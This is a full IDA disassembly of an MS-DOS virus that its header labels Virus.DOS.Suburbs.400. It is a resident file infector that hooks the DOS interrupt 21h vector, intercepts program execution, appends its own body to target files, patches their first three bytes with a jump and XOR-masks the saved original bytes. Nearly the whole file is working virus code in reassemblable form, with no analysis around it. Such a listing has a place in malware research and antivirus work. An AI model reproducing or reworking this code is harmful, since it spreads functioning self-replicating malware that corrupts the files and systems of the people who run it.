;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2025 Hex-Rays, <support@hex-rays.com>           |
; |                      License info: 48-2137-ACAB-99                      |
; |                      IDAPRO9 <idapro9@example.com>                      |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : F8A5DF1CC021080AD734FEB3F7543E0B9814740493E8189F2A2543DF45EFD331
; Input MD5    : FABBCDBECCCFF0C4A5F86456EB526176
; Input CRC32  : 8980F756
; Compiler     : Visual C++ (guessed)

; File Name   : /home/petik/Downloads/Virus.DOS.Suburbs.400-f8a5df1cc021080ad734feb3f7543e0b9814740493e8189f2a2543df45efd331
; Format      : MS-DOS executable (EXE)
; Base Address: 1000h Range: 10000h-1029Bh Loaded length: 29Bh
; Entry Point : 1000:100

.686p
.mmx
.model large


; Segment type: Pure code
seg000 segment byte public 'CODE' use16
assume cs:seg000
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
db 0
word_10001 dw 0
align 100h
assume ss:seg000, ds:nothing
; [00000003 BYTES: COLLAPSED FUNCTION start]
and     al, 24h
nop
nop
nop
nop
nop
retn
; [00000003 BYTES: COLLAPSED FUNCTION start_0]
mov     al, 3
iret
db 80h, 0FCh, 4Bh, 74h, 3, 0E9h, 0E3h, 0
db 60h, 1Eh, 6, 0B8h, 0, 43h, 0CDh, 21h
db 51h, 1Eh, 52h, 0B8h, 1, 43h, 33h, 0C9h
db 0CDh, 21h, 0B8h, 2, 3Dh, 0CDh, 21h, 93h
db 0B8h, 20h, 0, 8Eh, 0D8h, 89h, 1Eh, 7Bh
db 1, 0B8h, 24h, 35h, 0CDh, 21h, 6, 53h
db 0B8h, 24h, 25h, 0BAh, 3, 0, 0CDh, 21h
db 8Bh, 1Eh, 7Bh, 1, 0B8h, 0, 57h, 0CDh
db 21h, 52h, 51h, 0B4h, 3Fh, 0BAh, 7Bh, 1
db 90h, 0B9h, 3, 0, 0CDh, 21h, 73h, 3, 0EBh
db 7Ch, 90h, 81h, 3Eh, 7Bh, 1, 4Dh, 5Ah
db 74h, 73h, 81h, 3Eh, 7Bh, 1, 5Ah, 4Dh
db 74h, 6Bh, 0B8h, 0, 42h, 33h, 0C9h, 8Bh
db 16h, 7Ch, 1, 83h, 0C2h, 3, 0CDh, 21h
db 0B4h, 3Fh, 0BAh, 92h, 1, 90h, 0B9h, 3
db 0, 0CDh, 21h, 80h, 3Eh, 92h, 1, 0E9h
db 74h, 4Bh, 80h, 36h, 7Bh, 1, 21h, 80h
db 36h, 7Ch, 1, 85h, 80h, 36h, 7Dh, 1, 2Dh
db 0B8h, 2, 42h, 33h, 0C9h, 33h, 0D2h, 0CDh
db 21h, 8Bh, 0E8h, 0B4h, 40h, 33h, 0D2h
db 0B9h, 90h, 1, 90h, 0CDh, 21h, 72h, 25h
db 0B8h, 0, 42h, 33h, 0C9h, 33h, 0D2h, 0CDh
db 21h, 0BEh, 91h, 1, 90h, 0C6h, 6, 91h
db 1, 0E9h, 8Bh, 0C5h, 2Dh, 3, 0, 0A3h, 92h
db 1, 0BAh, 91h, 1, 90h, 0B4h, 40h, 0B9h
db 3, 0, 0CDh, 21h, 0B8h, 1, 57h, 59h, 5Ah
db 0CDh, 21h, 0B4h, 3Eh, 0CDh, 21h, 5Ah
db 1Fh, 0B8h, 24h, 25h, 0CDh, 21h, 0B8h
db 1, 43h, 5Ah, 1Fh, 59h, 0CDh, 21h, 7, 1Fh
db 61h, 0EAh, 4 dup(0)



start_0_0 proc near
pushad
push    ds
push    es
mov     di, ds
mov     ax, 20h ; ' '
mov     ds, ax
assume ds:nothing
cmp     word ptr ds:0, 0
jnz     short loc_1025E
mov     ds, di
assume ds:nothing
xor     ax, ax
mov     es, ax
assume es:nothing
mov     di, 84h
mov     ax, es:[di]
mov     bx, es:[di+2]
mov     si, ds:word_10001
add     si, 1F5h
mov     cs:[si], ax
mov     cs:[si+2], bx
xor     ax, ax
mov     di, ax
mov     si, ds:word_10001
add     si, 103h
push    cs
pop     ds
assume ds:seg000
mov     ax, 20h ; ' '
mov     es, ax
assume es:nothing
mov     cx, 190h
nop
rep movsb
xor     ax, ax
mov     es, ax
assume es:nothing
mov     di, 84h
mov     word ptr es:[di], 6
mov     ax, 20h ; ' '
mov     es:[di+2], ax

loc_1025E:
mov     ax, cs
mov     ds, ax
mov     es, ax
assume es:seg000
mov     si, word ptr start+1
add     si, 27Eh
xor     byte ptr [si], 21h
xor     byte ptr [si+1], 85h
xor     byte ptr [si+2], 2Dh
mov     di, 100h
mov     cx, 3
rep movsb
pop     es
assume es:nothing
pop     ds
assume ds:nothing
popa
push    100h
retn
start_0_0 endp

db 0B1h, 15h, 0BDh, 5Bh, 56h, 44h, 2Fh, 53h
db 4Ch, 41h, 4Dh, 5Dh, 0, 53h, 75h, 62h
db 75h, 72h, 62h, 73h, 0
seg000 ends


end start
